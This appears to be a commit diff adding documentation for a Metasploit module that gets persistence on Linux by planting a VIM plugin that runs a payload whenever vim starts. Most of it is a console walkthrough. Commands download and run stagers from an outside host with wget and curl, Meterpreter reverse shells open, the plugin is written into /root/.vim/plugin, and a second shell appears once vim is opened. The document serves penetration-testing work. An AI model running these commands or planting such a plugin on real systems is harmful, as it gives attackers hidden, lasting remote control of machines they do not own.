cleanup vim plugin

documentation/modules/exploit/linux/persistence/vim_plugin.md

@@ -0,0 +1,99 @@
+## Vulnerable Application
+
+This module creates a VIM Plugin which executes a payload on VIM startup.
+
+## Verification Steps
+
+1. Install the application if needed
+2. Start msfconsole
+3. Get a shell on a linux computer with vim installed
+4. Do: `use exploit/linux/persistence/vim_persistence`
+5. Do: `run`
+6. Start `vim` on the remote computer
+7. You should get a shell.
+
+## Options
+
+### NAME
+
+Name of the extension. Defaults to random.
+
+## Scenarios
+
+### vim 9.1.2141 on Kali 2026.1
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set srvport 8082
+srvport => 8082
+resource (/root/.msf4/msfconsole.rc)> set uripath l
+uripath => l
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4446
+lport => 4446
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4446
+[*] Using URL: http://1.1.1.1:8082/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO b1ULF8bg --no-check-certificate http://1.1.1.1:8082/l; chmod +x b1ULF8bg; ./b1ULF8bg& disown
+msf exploit(multi/script/web_delivery) >
+[*] 1.1.1.1   web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:35126) at 2026-03-30 08:43:36 -0400
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: h00die
+meterpreter > sysinfo
+Computer     : h00die-kali
+OS           : Debian  (Linux 6.18.12+kali-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/vim_persistence
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/persistence/vim_persistence) > set session 1
+session => 1
+msf exploit(linux/persistence/vim_persistence) > exploit
+[*] Command to run on remote host: curl -so ./mCslKCWV http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./mCslKCWV;./mCslKCWV&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
+[*] Started reverse TCP handler on 1.1.1.1:4444
+msf exploit(linux/persistence/vim_persistence) > [*] Running automatic check ("set AutoCheck false" to disable)
+[!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere.
+[!] The service is running, but could not be validated. VIM is installed
+[*] Writing plugin to /root/.vim/plugin/UAxJbJuMy.vim
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260330.4754/h00die-kali_20260330.4754.rc
+```
+
+Open vim
+
+```
+[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
+[*] Sending payload to 1.1.1.1 (curl/8.18.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:40448) at 2026-03-30 08:48:02 -0400
+```